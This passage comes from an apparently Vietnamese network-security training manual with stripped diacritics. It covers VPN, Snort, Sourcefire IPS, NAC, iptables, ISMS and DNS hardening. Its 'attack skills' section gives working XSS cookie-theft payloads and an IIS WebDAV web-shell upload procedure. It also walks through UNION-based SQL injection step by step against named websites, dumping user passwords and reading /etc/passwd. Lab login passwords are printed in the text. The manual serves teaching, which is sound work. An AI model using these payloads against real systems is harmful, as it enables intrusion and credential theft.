Nhn Add tip add Group m bn cho php thc hin kt ni VPN ti my ch ny.
7, 2012
7, 2012
7, 2012
Nhn OK hon thnh ton b qu trnh cu hnh trn my ch Routing and Remote Access.
c. To kt ni VPN t cc thit b truy cp qua Wifi
- Bc 1 va ri bn kt ni thnh cng ti mt mng WiFi nu khng s dng gii php
VPN th Access Point ca bn cm trc tip vo Modem ADSL l cc kt ni c th truy cp
ti Internet. Nhng nh vy s khng bo mt do mi m ha mt ln vi giao thc WPA v s
dng thut ton AES-TKIP. y bn c th s dng phng thc m ha WEP h tr cho
cc kt ni khng h tr giao thc WPA
- Trong gii php ny sau khi kt ni WiFi bn phi kt ni VPN na mi c th truy cp c
ra Internet. Vi ng dng VPN s dng m ha hai ln cho mt gi tin, ln 1 m ha vi WPA
ln 2 m ha tng IP vi PPTP hoc IPsec
Page | 95 Copyright by Tocbatdat
7, 2012
7, 2012
7, 2012
7, 2012
Kt ni
- Nhn dp vo kt ni ti va to g User vnexperts.net nm trong Group VPN c php kt
ni VPN ti my ch VPN: 192.168.50.1 / Nhn Connect
Qu trnh Xc thc
7, 2012
7, 2012
7, 2012
Event s c ni dung:
Note: Impact Flag l tnh nng kt hp gia IPS v RNA cho php nh gi mc ri
ro ca cuc tn cng. Mc nguy him nht l Flag 1, tip theo l 2,3,4 mc t ri ro
nht l mc Flag 1.
Qu trnh x l gi tin v Decoding
7, 2012
Sau khi Decode thit b Sourcefire s thc hin tip qu trnh Preprocessors v so snh
vi tp Rules
Cc Event s c to ra t cc qu trnh
7, 2012
Prepare install
L bc chun b h iu hnh, cc th vin, v b ci
Install
L bc tin hnh ci t, cu hnh cc dch v lin quan v snort.
NOTE_1: Bt my a Fedora Core 10, vo snapshot v Orgin. ng nhp vo Fedora
vi user: root v password: yeuemnhieu
NOTE_2: c k tng dng, dng no c du "#" u l ch minh ha cn dng khng
c du # l cu lnh.
NOTE_3: Dng no l ch in nghing l command line cn phi chy
NOTE_4: Sau khi logon hoc khi ng li phi t a ch IP vi cu lnh:
ifconfig eth0 192.168.0.x/24
route add default gw 192.168.0.1
echo "nameserver 208.67.222.222" > /etc/resolv.conf
Page | 104 Copyright by Tocbatdat
7, 2012
7, 2012
Ci t Snort
SELinux Disable
SELinux l dch v tng t nh UAC trn windows, thc hin t ng nhiu cu lnh mt
lc yu cu cn phi Disable tnh nng ny ca Fedora.
---> Vo System --> adminstration --> SELinux Management ri disable lm theo cc bc di
y:
- disable SElinux
- restart lai may tinh
- kiem tra SElinux OK
- dat dia chi IP
Service
ci t Snort cn phi tt v bt mt s Service, v d nh IPTABLES nu Enable th s
khng capture c d liu th sao lm IDS c. Cc Service cn phi lm l:
- Stop iptables
- start mysqld
- start httpd
Cu lnh cu hnh cc dch v ny l:
/etc/init.d/iptables stop
/etc/init.d/mysqld restart
/etc/init.d/httpd restart
Install Snort
Page | 106 Copyright by Tocbatdat
7, 2012
Gii nn v ci t snort
Ci t Snort vi cu lnh di y:
cd /root/Desktop
tar xzvf snort-2.8.5.tar.gz
cd snort-2.8.5
./configure --with-mysql && make && make install
cd /etc/snort
tar xzvf /root/Desktop/snortrules-snapshot-CURRENT.tar.gz
Cu hnh Snort
Vo th mc /etc/snort/etc copy tt c cc file ra ngoi th mc /etc/snort
Cu hnh file /etc/snort/snort.conf:
- Nhn p vo file s ra giao din Texteditor edit file vo:
+ Dng th 194 cu hnh: path rule l /etc/snort/rules
+ Dng th 259,260: Thm du # vo u dng (Snort free ch h tr 1 Detection Option)
+ Dng th 829: B du # u dng. Thit lp: user snort; passoword snort; database l
snort; host l localhost (Dng ny cu hnh user ng nhp vo MYSQL cho snort).
Ci t v cu hnh Database Mysql (user root cua toi password=123456)
Cu lnh cu hnh MYSQL:
mysql
grant CREATE, INSERT, SELECT, DELETE, UPDATE on snort.* to snort@localhost;
SET PASSWORD FOR snort@localhost=PASSWORD('snort');
Page | 107 Copyright by Tocbatdat
7, 2012
7, 2012
snort
Host:
Localhost
User:
snort
Pass:
Snort
7, 2012
Bc 5: Create BASE
Bc 6: OK
- cau hinh tu buoc 1 -> 5
Run SNORT
test snort chy hay khng chng ta download mt file exploit.rule t website ca mnh v
bng cu lnh di y:
Lu download xong phi vo th mc i tn file:
rm /etc/snort/rules/exploit.rules -f
cd /etc/snort/rules
wget http://tocbatdat.googlepages.com/exploit.rules
Sau khi download file exploit.rules b thay i tn nn chng ta cn phi thay i li v php.ini
Sau khi i tn tin hnh chy Snort bng cu lnh:
snort -v -c /etc/snort/snort.conf -l /etc/snort/log
5. View v Test kt qu
Dng Firefox truy cp a ch:
http://localhost/base-1.4.4
Th ping ra ngoi vi gi tin ln hn 800 bng cu lnh
ping 192.168.0.1 -s 888
Troubleshooting
Nu khng chy c Snort: 1. Xem li cc NOTE. 2 th kim tra li t Phn 1-5 ca
phn II ci t SNORT:
Page | 110 Copyright by Tocbatdat
7, 2012
Tnh nng
M t
Pht hin cc cuc tn cng t bn ngoi nh Worms,
Trojans, Buffer overflows, DoS attacks, Backdoor attacks,
Spyware, Port scans, VoIP attacks, IPv6 attacks, Statistical
anomalies, Protocol anomalies, P2P attacks, Blended
threats, Zero-day attacks vo cc server dch v
C th xc lp cc qui tc ngn chn cc cuc tn cng hoc
xc lp ch t ng tinh chnh ty theo cc dch v
a ra cc bo co v cc cuc tn cng, cc l hng bo
mt
STT
Tnh nng
Tnh nng
gim st cnh
bo tc thi
(Real time
Network
Awarreness RNA)
IT Policy
complicance
7, 2012
M t
RNA gip pht hin cc nguy c an ninh mng:Network
profile (OS, Services, Open Ports, Vulnerability, Host
static). RNA kt hp vi IPS, IDS t ng active/disable
cc rules cn thit bo v h thng mng.
Tnh nng Passive Scan cho php RNA pht hin nguy c
an ninh h thng mng m khng nh hng ti nng lc h
thng mng
a ra nhng cnh bo nhng vi phm v chnh sch bo
mt.Nhng vi phm ny c th l: mt cuc tn cng nguy
him xy ra, mt s c lin quan ti mt my ch hay mt
dch v.
Cnh bo c th thc hin qua Email, SNMP hay SYSLOG.
7, 2012
7, 2012
Gii thch nguyn l hot ng v cc thnh phn ca thit b SourceFire sensor qua v d sau:
Thit b SourceFire 3D Sensor 3D3500c 8 cng Ethernet lm nhim v Sensing:
Interface Sets:
+ Cc cng ny c nhm vo cc Interface Sets khc nhau. Trn hnh vi 3 Interface Sets
c to
7, 2012
+ Interface Sets c to ra c hai mode Passive v Inline (Inline v Inline with Fail Open)
Detection Engine: lm nhim v thc thi Monitoring trn Interface Sets (nh nhng ngi gc
cng). trn hnh c hai Detection Engine c to v thc thi nhim v Monitoring trn cc
Interface Sets. C 3 loi Detection Engine l: IPS, RNA, RUA
Policy: L chnh sch p dng cho cc loi Detection Engine. Intrusion Policy p dng cho IPS
Detection Engine, Detection Policy p dng cho RNA.
7, 2012
6, 2012
Step 1: Cc port sensing trn thit b Sourcefire 3D Sensor c nhm li thnh: Interface
Sets. M hnh trn l to ra Interface Sets dng Inline mode.
Step 2: Trn cc interface sets ny to ra cc Detection Engine vi chc nng gim st.
Step 3: cc Detection Engine hot ng cn phi xy dng chnh sch thit lp p
dng cho cc Detection Engine ny.
Step 4: Khi Detection Engine c cc hnh ng block traffic hay pht hin ra cc nguy c
an ninh s a ra cc Event.
d. Thit lp cc thng s qun tr cho cc thit b Sourcefire
Cm cable qun tr cho cc thit b
Trn cc thit b Sourcefire Sensor 3D cng qun tr l cng Eth1 nm pha sau thit b.
Trn thit b Sourcefire DC cng qun tr l cng Eth1 nm pha sau thit b
Cable qun tr c nh du r rng v cn phi chun b trc khi tin hnh lp t thit
b
Chun b cc Cable cm vo cc port sensing nh trong m hnh trin khai phn trn.
Thit lp cc thng s c bn cho thit b Sourcefire
+ t tn cho thit b theo ng quy hoch ca VNPT HN.
+ a ch IP
+ Password qun tr
-
6, 2012
vn hnh v qun tr h thng Sourcefire IPS cn phi bit kim tra cc thng tin h
thng cho ng vi thit k, thay i cc thit lp h thng cho ph hp vi yu cu t
ra.
Information
L thng tin chung nht v thit b Sourcefire.
6, 2012
Tn thit b, Model, Version, a ch IP. Quan trng l cho bit cc Policy c p dng
cho thit b.
-
License
L mc xem v qun l License cho thit b Sourcefire
6, 2012
Network
-
Cho php ngi qun tr xem v thit lp IP, DNS, Proxy, Hostname cho thit b
Sourcefire.
Network Interface
Cho php ngi qun tr thit lp cng qun tr
6, 2012
Process
Ngi qun tr c th truy cp vo mc process a ra cc lnh nh: Shutdown, Reboot
hoc Restart thit b Sourcefire
Remote Management
Ngi qun tr c th thc hin vic qun l tp trung cc thit b ca Sourcefire theo ng
nh ti liu thit k: Thit b DC1500 qun l 2 thit b Sensor 3D3500
-
Time
Cho php thit lp thi gian cho thit b
Ngoi ra cn c mt s thit lp khc nh
netflow device, Storage, Heath blacklist
6, 2012
Mgt_port
Sourcefire
3D3500
Sensor
Mgt_port
Sourcefire
DC1500
Switch
Mgt_port
Sourcefire
3D3500
Sensor
6, 2012
6, 2012
6, 2012
6, 2012
6, 2012
6, 2012
Qun tr IPS
Qun tr IPS bao gm vic thit lp chnh sch cho cc Detection Engine, qun l cc
Rules, qun l update SEU v mt s tnh nng khc
6, 2012
6, 2012
Ngi qun tr c th xem v thay i cc Detection Engine chu chnh sch ny.
Vi hnh di th hin Policy ny p dng cho mt Detection Engine l vng DMZ
ca VNPT H Ni
Ngi qun tr c th tinh chnh cc bin cho cc rules hot ng mt cch hiu qu
nht t cc thay i va nh ngha mi Variable:
V nh nu dch v HTTP s dng thm cng 443 chng ta s thm cng 443 vo
mc HTTP_PORTS
6, 2012
Ton b rule ca Sourcefire l khong trn 20.000 Rules uc update thng xuyn
qua vic Import SEU t ng t Sourcefire.
Mi Policy Intrusion p dng cho mi Detection Engine chng ta c th p dng
nhng Rules c Enable/Disable khc nhau.
Ngoi cc rule c enable v disable mc nh ngi qun tr cn phn tch tnh
hnh c th bt tt cc rule sao cho p ng yu cu v bo mt ca h thng.
Khi s dng tnh nng RNA pht hin h thng mng (Host active, OS, Service,
IP, MAC, Vulnerability). Th thit b Sourcefire c th s dng kt qu ny thay
i trng thi cc Rules nng cao hiu nng x l thit b, gim thiu cc Event
khng quan trng.
Chng ta c th s dng RNA recommend trng thi cc Rules
6, 2012
Advanced Settings cho Intrusion policy l phn thit lp quan trng i hi ngi
qun tr phi hiu bit su v h thng Sourcefire trc khi cu hnh trnh nh
hng ti h thng. Mc nh trong phn Advanced Settings ny hng cu hnh
mc nh
6, 2012
6, 2012
Sau khi lu Intrusion Policy ngi qun tr cn phi Apply policy cho cc
Detection Engines, sau khi apply cn phi kim tra qu trnh c thc hin thnh
cng hay khng
6, 2012
SEU
y l giao din gim st SEU c p dng vo Intrusion Policy
Ngoi ra ngi qun tr c th Update SEU cho thit b Sourcefire bng cch
download SEU t trang web Sourcefire ri Import vo thit b
Rule Editor
Mc nh Sourcefire c khong trn 20.000 Rules nhng ngi qun tr hon ton
c th thm cc Rule mi vo m bo cc chnh sch bo mt cho h thng ca
mnh. Trong giao din qun tr Rule Editor ngi qun tr c thm xem ni dung,
sa ni dng ca rule vi cc thit lp c th, cho php qun l Rule.
6, 2012
6, 2012
Email alert
Khi nhng rule c match th th thit b Sourcefire s gi cnh bo ti ngi
qun tr.
Ngi qun tr c th s dng tnh nng Email Alert hoc s dng chnh sch
Compliance Policy
6, 2012
Qun tr RNA
RNA l mt tnh nng cao cp ca Sourcefire cho php pht hin h thng mng
bng phng thc Passive Scan thc hin 24/7.
Qun tr RNA chng ta cn thit lp cc mc di y:
Detection Policy
Detection Policy l chnh sch c p dng cho cc RNA Detection Engine.
Ngi qun tr cn phai to ra chnh sch ny p dng cho cc RNA Detection
Engin nhm pht hin h thng mng.
Giao din qun tr cc Detection Engine
Ngi qun tr c th tinh chnh cho RNA Detection Engine qua vic cu hnh
Detection Policy
Di y l giao din qun tr v cc thit lp c thc hin trong phn trin khai
thit b Sourcefire
6, 2012
Host Atributes
t cho mt vng mng
Ti VNPT H Ni t tn l VNPT Ha Noi v kt hp vi Network Map mt tnh
nng ca RNA
Network Map
Netowrk Map cho php ngi qun tr bit c h thng mng vi cc thng tin:
+ Host Active: c phn theo cc gii mng khc nhau
+ OS: Chi tit v h iu hnh
6, 2012
6, 2012
RNA Detector
Ngi qun tr c th cu hnh RNA Detector enable hay Disable cc thit lp
ca RNA
Services hot ng trong h thng mng
Ngi qun tr c th vo RNA Services pht hin xem h thng ang chy
nhng Services g v nhng Services ang hot ng trn my no
6, 2012
6, 2012
6, 2012
6, 2012
6, 2012
6, 2012
Kaspersky
Interne
Gatewa
Endpoint Security for File Server
6, 2012
Kaspersky Security
Center MASTER
Kaspersky
Security
Center SLAVE
6, 2012
Control component:
Protection Component:
Qun l ng dng
Qun l d liu
M ha d liu
6, 2012
nhn bit theo ni dung ca vic trin khai h thng bo mt cho doanh nghip trn din rng,
ng thi tin hnh nhng bc quan trng bo mt cng nh ngn chn mt mt d liu.
Symantec Data Loss Prevention 10 s cho php doanh nghip ng dng c ch m ha v qun l
phn quyn doanh nghip (ERM - Enterprise rights management) da trn ni dung, ng thi tch
hp d dng vi cc gii php khc ca Symantec.
ng dng m ha v ERM theo ni dung
Tnh nng mi FlexResponse ca Symantec Data Loss Prevention 10 s gip nhm bo mt ca
doanh nghip p dng nhng c ch bo mt theo chnh sch i vi cc tp tin c cha d liu
quan trng, bao gm m ha hay ERM. Hin nay, vic kt hp gia DLP vi cc gii php CNTT
khc ang phi thc hin bng tay.
Nh hp tc vi cc nh cung cp th 3 hng u khc, nh GigaTrust, Liquid Machines, Oracle
v PGP Corporation, Symantec s mang n cho cc khch hng s a dng v cc la chn gii
php bo v tch hp.
V d, mt cng ty hin ch cho php mt s t ngi c truy cp thng tin v tha thun st
nhp cng ty s d dng p dng chnh sch DLP ca h phn loi d liu, ng thi s dng
Microsoft Active Directory Rights Management Services (ADRMS - Dch v qun l phn quyn
th mc ng ca Microsoft) p dng ERM i vi nhng bn sao lu ca d liu ny, mang
li mt c ch bo v mn rt hiu qu.
Tng cng kh dng ca Tnh thng minh DLP
Nhng h tr mi nht i vi XML v Dch v web s cho php gii php Symantec Data Loss
Prevention 10 gi nhng d liu DLP ti mi ng dng hoc h thng bo co, bao gm c cc
bng iu khin bo mt doanh nghip hay cc gii php v tun th, nh b gii php kim sot
tun th Symantec Control Compliance Suite.
V d, mt trang thng mi in t c th khi u bng cch dng DLP xc nh my ch c
nhng d liu chu s iu chnh ca cc iu lut PCI DSS. Nh gi thng tin ny ti cng c
Control Compliance Suite ca Symantec, th nhng my ch s c u tin kim tra thng
xuyn hn, theo c c s kim sot k lng i vi nhng khu vc lu tr d liu quan
trng.
Nhng tnh nng import/export mi (np/xut chnh sch) s cho php cc t chc m bo chnh
sch ca h c cp nht thng xuyn quy nh mi, ng thi lin kt v trao i cc chnh
sch vi nhiu ngi dng khc nhm chia s kinh nghim thc tin tt nht.
Page | 150 Copyright by Tocbatdat
6, 2012
6, 2012
kim tra. 1. Ci t Agent kim tra my tnh c m bo tnh an ton hanh khng. 2. NAC
gateway s a ra Policy quyt nh my tnh c c truy cp vo nhng vng no.
y ti trnh by mt bi vit v Cisco NAC, cc h thng khc hot ng tng t:
Cisco NAC l mt cch trin khai Network Admission Control mt cch n gin, c s dng
cho cu trc mng m bo cc chnh sch bo mt c p dng cho ton b cc thit b truy
cp vo cc ti nguyn mng. Vi NAC, cc nh qun tr c th xc thc, u quyn, v nh gi,
da trn cc kt ni s dng dy hay wireless, cc ngi dng truy cp t xa. N nhn din c
cc thit b nh laptops, IP phones, hay cc my chi game, vi cc chnh sch bo mt v ngn
chn cc nguy c tim n trong qu trnh truy cp d liu ca ngi dng
Tc dng ca Network Admission Control
D liu trong h thng mng b nhim virus hin nay l mt vn cn c quan tm mt cch
thch ng, cc loi virus ngy cng c nh hng ln i vi h thng. Ti nguyn c s dng
c bo m khng b nhim virus l mt yu cu v cn phi c thc hin, vi tnh nng
chng
virus
hiu
qu
Network
Admission
Control
l
mt
gii
php.
Cisco NAC gip m bo tnh trng ca cc my client trc khi truy cp vo mng. NAC lm
vic vi mt chng trnh Anti-Virus to ra cc iu kin, cc chnh sch thit lp c cung
cp cho cc my client trc khi chng truy cp vo cc ti nguyn mng.
NAC m bo cc my client trong mng lun lun c cp nht cc bn nng cp cho phn
mm dit virus mt cch tt nht. Nu client c mt yu cu cp nht bn nng cp, gii php
NAC s mang n kh nng cung cp cp nht trc tip cho qu trnh cp nht t cc my client.
Nu client c s xut hin t ngt virus c th gy ra nh hng i vi ton mng, NAC s
chuyn my client n mt vng mng c cch ly hon ton cho n khi qu my client c
kim tra mt cch k lng v m bo khng cn virus cng nh nhng kh nng nguy hai cho
h thng mng.
Cch lm vic ca Network Admission Control.
Vic trin khai ng dng NAC c tch hp t nhiu giao thc hin nay thng s dng v cc
sn phm ca Cisco vi mt vi sn phm v cc tnh nng nh:
Cisco Trust Agent (CTA) and plug-ins
Cisco IOS Network Access Device (NAD)
Extensible Authentication Protocol (EAP)
Cisco Secure Access Control Server (ACS)/Remote Authentication Dial-In User Service
(RADIUS)
Posture validation/remediation server
Page | 152 Copyright by Tocbatdat
6, 2012
CTA giao tip vi cc phn mm khc trn my client qua Application Program Interface (API) v
tr li v tnh trng ca mnh t cc yu cu ca NAD. CTA l yu cu cn thit giao tip trong
qu trnh trin khai NAC (CTA giao tip vi NAC s dng EAP qua giao thc UDP). Mt phn
mm bao gm mt Posture Plug-In (PP) to nn giao din cho CTA. PP l mt tc nhn c thc
hin trn mt phn mm t cc nh sn xut khc c tc dng thc hin cc chnh sch v trng
thi ca phn mm .
Hin ti vic trin khai NAC th NAD l phn mm Layer 3 Cisco IOS trong cc thit b dng
truy vn cc my client tm kim v kim sot tnh hnh s dng EAP qua giao thc UDP (EAP
over UDP - EOU). Phng php ny khc vi cc thnh phn ca gii php NAC c th hin
hnh di y:
Hnh:
hin
th
cch
NAC vi cc thnh phn lm vic vi nhau:
thc
NAC
lm
vic
6, 2012
6, 2012
6, 2012
6, 2012
ngoi nhn. IpTables chu trch nhim giao tip gia ngi dng v Netfilter y cc
lut ca ngi dng vo cho Netfilter x l. Netfilter tin hnh lc cc gi d liu mc
IP. Netfilter lm vic trc tip trong nhn, nhanh v khng lm gim tc ca h thng.
c thit k thay th cho linux 2.2.x Ipchains v linux 2.0.x ipfwadm v c nhiu c
tnh hn Ipchains v n c xy dng hp l hn vi nhng im sau:
Netfilter/Iptables c kh nng g?
Xy dng bc tng la da trn c ch lc gi stateless v stateful
Dng bng NAT v masquerading chia s s truy cp mng nu khng c a ch mng.
Dng bng NAT ci t transparent proxy Gip cc h thng tc v iproute2 to cc
chnh sch router phc tp v QoS. Lm cc thay i cc bit(mangling) TOS/DSCP/ECN
ca IP header.
C kh nng theo di s kt ni, c kh nng kim tra nhiu trng thi ca packet. N lm
vic ny cho UDP v ICMP tt nht l kt ni TCP, v d tnh trng y ca lc ICMP
ch cho php hi m khi c yu cu pht i, ch khng chn cc yu cu nhng vn chp
nhn hi m vi gi s rng chng lun p li lnh ping. S hi m khng do yu cu c
th l tn hiu ca s tn cng hocca sau. X s n gin ca cc packet tho thun
trong cc chains (mt danh sch cc nguyn tc) INPUT, OUTPUT, FORWARD. Trn cc
host c nhiu giao din mng, cc packet di chuyn gia cc giao din ch trn chain
FORWARD hn l trn 3 chain.
Phn bit r rng gia lc packet v NAT (Nework Address Translation)
C kh nng gii hn tc kt ni v ghi nht k. Bn c th gii hn kt ni v ghi nht k t
trnh s tn cng t chi dch v (Deinal of service).C kh nng lc trn cc c v a ch vt
l ca TCP. L mt firewall c nhiu trng thi, nn n c th theo di trong sut s kt ni, do
n an ton hn firewall c t trng thi.Iptables bao gm 4 bng, mi bng vi mt chnh sch
(police) mc nh v cc nguyn tc trong chain xy dng sn.
Ipchain
Mt trong nhng phn mm m Linux s dng cu hnh bng NAT ca kernel l Ipchain. Bn
trong chng trnh Ipchain c 2 trnh kch bn (scrip) chnh c s dng n gin ha cng
tc qun tr Ipchains.Ipchain c dng ci t, duy tr v kim tra cc lut ca Ip firewall trong
Linux kernel. Nhng lut ny c th chia lm nhm chui lut khc nhau l:
Ip Input chain (chui lut p dng cho cc gi tin i n firewall).
Ip Output chain (chui lut p dng cho cc gi tin c pht sinh cc b trn firewall v i ra
khi firewall).
Page | 157 Copyright by Tocbatdat
6, 2012
Ip forwarding chain (p dng cho cc gi tin c chuyn tip ti my hoc mng khc qua
firewall). V cc chui lut do ngi dng nh ngha (user defined).
Ipchains s dng khi nim chui lut (chain ) x l cc gi tin. Mt chui lut l mt danh
sch cc lut dng x l cc gi tin c cng kiu l gi tin n, gi tin chuyn tip hay gi tin
i ra.Nhng lut ny ch r hnh ng no c p dng cho gi tin. Cc lut c lu tr trong
bng NAT l nhng cp a ch IP ch khng phi tng a ch IP ring l.
Mt lut firewall ch ra cc tiu chun packet v ch n. Nu packet khng ng lut k tip
s c xem xt, nu ng th lut k tip s ch nh r gi tr ca ch c th cc chain do ngi
dng nh ngha hay c th l mt trong cc gi tr c th sau: ACCEPT, DENY, REJECT, MASQ
REDICRECT hay RETURN.
c
dng
khi
Linux
kernel
c
bin
dch
vi
tham
s
CONFIG_IP_TRANSPARENT_PROXY c nh ngha. Vi iu ny packets s c chuyn
ti socket cc b, thm ch chng c gi n host xa. Mt s c php hay c s dng:
Ipchains [ADC] chain rule-specification [options]
Ipchains [RI] chain rulenum rule-specification
[options]
Ipchains D chain rulenum [options]
Ipchains [LFZNX] [chain] [options] Ipchains P chain target [options]
Ipchains M [-L | -S] [options]
6, 2012
L thuyt v Security
K nng tn cng
Xy dng chnh sch an ninh mng l bc hon thin mt mi trng lm vic v hot ng
theo chun bo mt. Hin nay nc ta c rt nhiu n v ang xy dng chnh sch bo mt
theo chun ISO 27001, s dng m hnh ISMS.
b. Quy trnh tng quan xy dng chnh sch tng quan:
Plan
Xc nh mc tiu
Xc nh v nh lng ri ro an ton thng tin
Xc nh cc yu cu cn tun th
Xy dng chnh sch
Do
Thit k h thng
Trin khai cc chnh sch/bin php bo v h tng
Ci t an ton h thng my ch
Ci t an ton h thng my trm
c. H thng ISMS
M hnh h thng ISMS
6, 2012
6, 2012
6, 2012
6, 2012
Risk assessment
Security policy
Organization of information security
Asset management
Human resources security
Physical and environmental security
Communications and operations management
Access control
Information
systems
acquisition,
development
and
maintenance
6, 2012
Introduction
Scope
Terms & Definitions
Structure of this Standard
5. Obtaining Management Approval for Initiating the Project to Implement an ISMS
6. Defining ISMS Scope and ISMS Policy
7. Conducting Organization Analysis
8. Conducting Risk Assessment and Risk Treatment Planning
9. Designing the ISMS
AN TON NG DNG
IV.
DNS Forwarder (Trnh chuyn tip) l mt my ch DNS thc hin truy vn DNS thay cho
nhiu my ch DNS khc. DNS Forwarder c s dng g b nhng tc v ang x l khi
nhng my ch DNS ang thc hin chuyn tip
nhng truy vn ny sang Forwarder, v tng lu lng
b nh m DNS trn DNS Forwarder.
6, 2012
ngn cn my ch DNS chuyn tip yu cu trong khi tng tc vi nhng my ch DNS trn
Internet. y l chc nng c bit quan trng v khi my ch DNS cha ti nguyn bn trong
min DNS. Thay v cho php nhng my ch DNS ni b t thc hin gi li lnh v lin lc vi
nhng my ch DNS khc, n cu hnh cho my ch DNS ni b s dng mt Forwader cho tt c
cc min khng c phn quyn.
DNS Advertiser (Trnh qung co) l mt my ch DNS thc hin truy vn cho nhng min
m DNS Advertiser c phn quyn. V d, nu bn lu tr ti nguyn cho domain.com v
corp.com, my ch DNS cng cng s c cu hnh vi vng file DNS cho min domain.com v
corp.com.
S khc bit gia DNS Advertiser vi my ch DNS cha vng file DNS l DNS
Advertiser tr li nhng truy vn t tn min m n phn quyn. My ch DNS s khng gi li
truy vn c gi ti nhng my ch khc. iu ny ngn cn ngi dng s dng my ch DNS
cng x l nhiu tn min khc nhau, v lm tng kh nng bo mt bng cch gim bt nhng
nguy c khi chy DNS Resolver cng cng (gy tn hi b nh m).
6, 2012
Nhiu my ch DNS cho php cp nht ng. Tnh nng cp nht ng gip nhng my ch
DNS ny ng k tn my ch DNS v a ch IP cho nhng my ch DHCP cha a ch IP.
DDNS c th l mt cng c h tr qun tr hiu qu trong khi cu hnh th cng nhng mu ti
nguyn DNS cho nhng my ch ny.
6, 2012
Tuy nhin, Zone Transfer khng gii hn my ch DNS ph. Bt c ai cng c th chy mt
truy vn DNS cu hnh my ch DNS cho php Zone Transfer kt xut ton b vng file c s
d liu. Ngi dng xu c th s dng thng tin ny thm d gin tn trong cng ty v tn
cng dch v cu trc h tng ch cht. Bn c th ngn chn iu ny bng cch cu hnh my
ch DNS t chi Zone Transfer thc hin yu cu, hay cu hnh my ch DNS cho php Zone
Transfer ch t chi yu cu ca mt s my ch nht nh.
h. S dng Firewall kim sot truy cp DNS
6, 2012
Trn nhng my ch DNS nn tng Windows, kim sot truy cp cn c cu hnh trong
nhng ci t Registry lin quan ti my ch DNS cho php nhng ti khon c yu cu truy
cp c v thay i ci t ca Registry.
Trn nhng my ch DNS nn tng Windows, bn nn cu hnh kim sot truy cp trn file
h thng lin quan ti my ch DNS v vy ch nhng ti khon yu cu truy cp vo chng c
cho php c hay thay i nhng file ny.
6, 2012
6, 2012
6, 2012
Bo mt my ch vWeb layer OS
Thc hin cc bc bo mt cho h iu hnh phn trn ca ti liu ny c mt h
iu hnh an ton
d. Khai thc l hng trn Web Service
S dng Active Perl + Code khai thc file.pl + Shell download cc nhiu trn mng
khai thc l hng IIS WebDAV
Bc 1: Ci t Active Perl
Bc 2: Copy file tocbatdat.pl (file attack)
Bc 3: Upload Shell rhtools.asp
6, 2012
6, 2012
Bc 4: chy file ny
Linux# ./rcvalle-rapache IP
6, 2012
Lc ny trnh duyt ca nn nhn v tnh thc hin script c user post ln Server. Da vo
script ny, tin tc c th n cp cookie ca nn nhn v log in vo h thng.
Cc cu lnh kim tra XSS:
"><script>alert('hey')</script>
http://ha.ckers.org/xss.html All Cheat Code XSS
"><script>exec(%systemroot%\system32\cmd.exe)</script>
"><script>while(1){alert('hey')}</script> Vo han
"><script>alert(document.cookie)</script>
LeapLastLogin=20090523152133;
PHPSESSID=28026127959bf076767f3adac1c736d5
Gii thiu v SQL Injection:
y l K thut tn cng ny li dng nhng l hng trn ng dng(khng kim tra k nhng k
t nhp t ngi dng). Thc hin bng cch thm cc m vo cc cu lnh hay cu truy vn
SQL (thng qua nhng textbox) trc khi chuyn cho ng dng web x l, Server. Thc hin v
tr v cho trnh duyt (kt qu cu truy vn hay nhng thng bo li) nh m cc tin tc c
th thu thp d liu, chy lnh (trong 1 s trng hp) v sau cho c th chim c quyn kim
sot ca h thng. Sau y l 1 s th thut cn bn.
VD Khai thc l hng SQL Injection ca MySQL v PHP
http://tocbatdat.edu.vn/?show=news&ic=3&list=8_148&lg=1
Kim tra li trn website
Kim tra xem c bao nhiu trng: 1 order by 30
Kim tra trng li: 1 and 1=0 union select 1 and 1=0 union
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
Pht hin ra trng li l 4 thc hin bc tip theo:
Exploit
Page | 174 Copyright by Tocbatdat
select
6, 2012
Bc 1: Show table
1
and
1=0
union
select
1,database(),3,group_concat(unhex(hex(table_name))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,
21,22,23,24,25,26,27,28,29 from information_schema.tables-- &catid=20
Bc 2: Show Column
group_concat(unhex(hex(column_name)))
http://www.tocbatdat.edu.vn/index.php?lg=1
and
1=0
union
select
1,database(),3,group_concat(unhex(hex(column_name))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
20,21,22,23,24,25,26,27,28,29 from information_schema.columns where table_name=char(106,
111, 115, 95, 117, 115, 101, 114, 115)-- &catid=20
Bc 3: Get Database;
http://www.tocbatdat.edu.vn/index.php?lg=1
and
1=0
union
select
1,database(),3,group_concat(username,0x2f,password,0x2f,email,userType),5,6,7,8,9,10,11,12,13,
14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from jos_users-- &catid=20
Bc 4: Doc file he thong
http://www.tocbatdat.edu.vn/index.php?lg=1
and
1=0
union
select
1,database(),3,load_file(char(47, 101, 116, 99, 47, 112, 97, 115, 115, 119,
100)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- &catid=20
http://tocbatdat.edu.vn/?show=news&ic=3&list=8_148&lg=1%20and%201=0%20union%20select
%201,2,3,4,group_concat%28TenDN,0x2f,MatKhau%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2
0,21,22%20from%20maxcare_tbadmin-3. An ton dch v Mail Server
a. Gii thiu tng quan v SMTP, POP, IMAP
a.1 Kin trc v hot ng ca th in t
Mun gi th in t ngi gi cn phi c mt account trn mt my ch th. Mt my ch c
th c mt hoc nhiu account. Mi account u c mang mt tn khc nhau (user). Mi
Page | 175 Copyright by Tocbatdat
6, 2012
6, 2012
6, 2012
6, 2012
MIME v SMTP
MIME (Multipurpose Internet Mail Extensions) cung cp thm kh nng cho SMTP v
cho php cc file c dng m ho multimedia i km vi bc in SMTP chun. MIME
s dng bng m Base64 chuyn cc file dng phc tp sang m ASCII chuyn i.
MIME l mt tiu chun mi nh n hin c h tr bi hu ht cc ng dng, v bn
phi thay i nu chng trnh th in t ca bn khng c h tr MIME. MIME c
quy chun trong cc tiu chun RFC 2045-2049.
S/MIME
L mt chun mi ca MIME cho php h tr cho cc bc in c m ho. S/MIME da
trn k thut m cng cng RSA v gip cho bc in khng b xem trm hoc chn ly.ho
Lnh ca SMTP
Mt cch n gin SMTP s dng cc cu lnh ngn iu khin bc in. Bng di
l danh sch cc lnh ca SMTP. Cc lnh ca SMTP c xc nh trong tiu chun RFC
821.
HELO
MAIL
RCPT
DATA
RSET
